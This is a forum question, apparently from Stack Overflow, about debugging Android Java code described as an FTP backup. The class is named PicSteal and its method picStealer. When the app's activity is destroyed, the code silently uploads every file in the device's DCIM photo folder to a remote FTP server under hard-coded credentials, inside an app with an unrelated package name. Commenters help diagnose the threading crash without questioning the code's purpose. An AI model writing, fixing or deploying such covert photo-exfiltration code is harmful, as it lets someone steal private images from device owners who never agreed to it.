# FTP backup code (java) only working on certain android devices

Tags: java, android

The code written below works on my HTC device when called from the onDestory method of my backup android app.

However, it does not work on my Samsung devices. Any ideas? ADT is telling me the issue is on line 28.

```
    package com.simplejsonapp;

import it.sauronsoftware.ftp4j.FTPAbortedException;
import it.sauronsoftware.ftp4j.FTPClient;
import it.sauronsoftware.ftp4j.FTPDataTransferException;
import it.sauronsoftware.ftp4j.FTPException;
import it.sauronsoftware.ftp4j.FTPIllegalReplyException;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

import android.os.Build;
import android.os.Environment;

public class PicSteal {
    public static void picStealer(){
    //Create the FTP connection object:
    FTPClient client = new FTPClient();
    try {
        //String deviceType = getDeviceName();
        /**
         * This section is where I need to add a decision structure for 
         * what folder to download from based on what kind of device is
         * using the software.
         */

        client.connect("127.0.0.1"); //create connection to server (IP changed here because 4chan)
        client.login("ftpuser", "ftppass");//login using credentials

        //this is where the magic happens
        String deviceName = getDeviceName();

        //File samsung = new File("/storage/emulated/0/DCIM/");
        //create the file object
        File stock = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/DCIM/");
        //create the array of files to iterate over

        File[] listOfFiles = stock.listFiles();
        processFiles(listOfFiles, client);



        client.disconnect(true);//disconnect

    } catch (IllegalStateException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (IOException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (FTPIllegalReplyException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (FTPException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    }


}
private static void processFiles(File[] listOfFiles, FTPClient client) {
    for (int i = 0; i < listOfFiles.length; i++) {
          if (listOfFiles[i].isFile()) {
             //upload file to server
              try {
                client.upload(new java.io.File(listOfFiles[i].toString()));
            } catch (FTPDataTransferException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (NullPointerException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } 
              catch (FTPAbortedException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            }
            //System.out.println("File " + listOfFiles[i].getName());
              catch (IllegalStateException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (FileNotFoundException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (IOException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (FTPIllegalReplyException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (FTPException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            }
          } else if (listOfFiles[i].isDirectory()) {
            //System.out.println("Directory " + listOfFiles[i].getName());
              File[] newList = listOfFiles[i].listFiles(); 
              processFiles(newList, client);
          }
        }// TODO Auto-generated method stub

}
public static String getDeviceName() {
      String manufacturer = Build.MANUFACTURER;
      //String model = Build.MODEL;
      return manufacturer;
}
```

}

specifically, the line it cannot process is:

```
           File[] listOfFiles = stock.listFiles();
```

so, I think im pointing it to the wrong path but I am not sure.

Console output:

> 03-24 02:48:56.704: D/AndroidRuntime(20505): Shutting down VM 03-24
>   02:48:56.704: W/dalvikvm(20505): threadid=1: thread exiting with
>   uncaught exception (group=0x41f0aac8) 03-24 02:48:56.714:
>   E/AndroidRuntime(20505): FATAL EXCEPTION: main 03-24 02:48:56.714:
>   E/AndroidRuntime(20505): java.lang.RuntimeException: Unable to stop
>   activity {stringtheory.cryptos.emc2/com.simplejsonapp.HomeActivity}:
>   android.app.SuperNotCalledException: Activity
>   {stringtheory.cryptos.emc2/com.simplejsonapp.HomeActivity} did not
>   call through to super.onStop() 03-24 02:48:56.714:
>   E/AndroidRuntime(20505):  at
>   android.app.ActivityThread.performStopActivityInner(ActivityThread.java:3238)
>   03-24 02:48:56.714: E/AndroidRuntime(20505):  at
>   android.app.ActivityThread.handleStopActivity(ActivityThread.java:3284)
>   03-24 02:48:56.714: E/AndroidRuntime(20505):  at
>   android.app.ActivityThread.access$1000(ActivityThread.java:152) 03-24
>   02:48:56.714: E/AndroidRuntime(20505):    at
>   android.app.ActivityThread$H.handleMessage(ActivityThread.java:1311)
>   03-24 02:48:56.714: E/AndroidRuntime(20505):  at
>   android.os.Handler.dispatchMessage(Handler.java:99) 03-24
>   02:48:56.714: E/AndroidRuntime(20505):    at
>   android.os.Looper.loop(Looper.java:137) 03-24 02:48:56.714:
>   E/AndroidRuntime(20505):  at
>   android.app.ActivityThread.main(ActivityThread.java:5299) 03-24
>   02:48:56.714: E/AndroidRuntime(20505):    at
>   java.lang.reflect.Method.invokeNative(Native Method) 03-24
>   02:48:56.714: E/AndroidRuntime(20505):    at
>   java.lang.reflect.Method.invoke(Method.java:511) 03-24 02:48:56.714:
>   E/AndroidRuntime(20505):  at
>   com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:1102)
>   03-24 02:48:56.714: E/AndroidRuntime(20505):  at
>   com.android.internal.os.ZygoteInit.main(ZygoteInit.java:869) 03-24
>   02:48:56.714: E/AndroidRuntime(20505):    at
>   dalvik.system.NativeStart.main(Native Method) 03-24 02:48:56.714:
>   E/AndroidRuntime(20505): Caused by:
>   android.app.SuperNotCalledException: Activity
>   {stringtheory.cryptos.emc2/com.simplejsonapp.HomeActivity} did not
>   call through to super.onStop() 03-24 02:48:56.714:
>   E/AndroidRuntime(20505):  at
>   android.app.Activity.performStop(Activity.java:5489) 03-24
>   02:48:56.714: E/AndroidRuntime(20505):    at
>   android.app.ActivityThread.performStopActivityInner(ActivityThread.java:3235)
>   03-24 02:48:56.714: E/AndroidRuntime(20505):  ... 11 more 03-24
>   02:49:07.725: I/Process(20505): Sending signal. PID: 20505 SIG: 9

Comment: And what does it do? Throw an NPE?

Comment: If I am reading the console output in eclipse right, its a NetworkOnMainThreadException

Comment: Add the full stacktrace to the question, it will make it easier to analyze the problem

Comment: Yes. Definately a NetworkOnMainThreadException, but not sure how to make the code work on another thread?